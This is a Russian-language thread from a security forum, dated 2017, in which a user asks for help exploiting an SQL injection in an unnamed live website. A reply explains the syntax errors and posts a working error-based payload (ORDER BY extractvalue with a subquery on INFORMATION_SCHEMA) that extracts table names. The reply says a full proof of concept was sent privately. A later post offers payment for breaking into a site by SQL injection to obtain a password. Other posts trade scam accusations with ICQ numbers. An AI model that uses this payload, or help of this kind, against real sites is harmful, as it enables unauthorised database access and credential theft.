HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу SQL - injection.
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.03.2017, 13:09
elvir
Guest
Сообщений: n/a
Провел на форуме:
2741

Репутация: 0
По умолчанию
Нужна помощь: есть сайт вида http://xxxx/?r=club/catalog/detail&id=12при подстановки ковычки id=12' вылазит следующая ошибка:

CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND date = 201703' at line 1

при попытки подобрать кол-во столбцов http://xxxx/?r=club/catalog/detail&id=12+order+by+1+--+ (или http://xxxx/?r=club/catalog/detail&i...er+by+1000+--+)появляется такая ошибка:

CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42S22]: Column not found: 1054 Unknown column '1' in 'order clause'

пробовал и - ставит впереди 12, и ковычку после 12 и делать запрос, всё равно не могу понять в чём проблема. Может кто подскажет, или как в SQLmape раскрутить, я так понял уязвимый параметр id.
 
Ответить с цитированием

  #2  
Старый 19.03.2017, 14:08
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию
Таргет в лс. А вообще смотри на саму ошибку где ругается. В первом случае потеряна кавычка у строки '' AND date = [Вот здесь]201703' или наоборот последняя лишняяВо втором случае оператор order by считает 1 текстовой строкой.
 
Ответить с цитированием

  #3  
Старый 19.03.2017, 14:36
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию
Как обычно полный РоС выслал в ЛС. А если кому интересно то решается еррор бэйседом в ордер бай.

Код:
Code:
site.ru/detail&id=-53 order by extractvalue(0x0a,concat(0x0a,(select TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()   LIMIT 1,1))) -- -
 
Ответить с цитированием

  #4  
Старый 27.03.2017, 00:45
because
Новичок
Регистрация: 21.12.2009
Сообщений: 4
Провел на форуме:
285699

Репутация: 0
По умолчанию
ТС, КИДАЛА!!!

БУДЬТЕ ОСТОРОЖНЫ!
 
Ответить с цитированием

  #5  
Старый 27.03.2017, 00:54
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию
Цитата:
Сообщение от because  
because said:

ТС, КИДАЛА!!!

БУДЬТЕ ОСТОРОЖНЫ!
Интересно в чем же? Он ничего не обещал
 
Ответить с цитированием

  #6  
Старый 27.03.2017, 00:55
because
Новичок
Регистрация: 21.12.2009
Сообщений: 4
Провел на форуме:
285699

Репутация: 0
По умолчанию
Цитата:
Сообщение от SooLFaa  
SooLFaa said:

Интересно в чем же? Он ничего не обещал
К этой теме не относится, товар продавал и после перевода сразу пропал.
 
Ответить с цитированием

  #7  
Старый 27.03.2017, 00:56
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию
Цитата:
Сообщение от because  
because said:

К этой теме не относится, товар продавал и после перевода сразу пропал.
Интересно на пруфы взглянуть. Ну а так, за такое модеры обычно банят.
 
Ответить с цитированием

  #8  
Старый 27.03.2017, 01:02
because
Новичок
Регистрация: 21.12.2009
Сообщений: 4
Провел на форуме:
285699

Репутация: 0
По умолчанию
Цитата:
Сообщение от SooLFaa  
SooLFaa said:

Интересно на пруфы взглянуть. Ну а так, за такое модеры обычно банят.
Суи уже отписал)

На 500р кинул

ICQ - 712024700

ICQ - 707394583

Со второй аськи написала примерно через час после первого, с историей что мы когда-то там общались и у него есть ахуенный товар Только он не учел что он был единственным с кем я там общался и никому этот контакт не давал)
 
Ответить с цитированием

  #9  
Старый 27.03.2017, 02:07
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию
Цитата:
Сообщение от because  
because said:

Суи уже отписал)
На 500р кинул
ICQ - 712024700
ICQ - 707394583
Со второй аськи написала примерно через час после первого, с историей что мы когда-то там общались и у него есть ахуенный товар
Только он не учел что он был единственным с кем я там общался и никому этот контакт не давал)
Бывает
 
Ответить с цитированием

  #10  
Старый 27.07.2017, 15:43
tochka_zrenia
Guest
Сообщений: n/a
Провел на форуме:
284

Репутация: 0
По умолчанию
Ищу специалиста, проверить сайт на уязвимость типа sql injection с последующим получением пароля $$$

пишите в личку
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ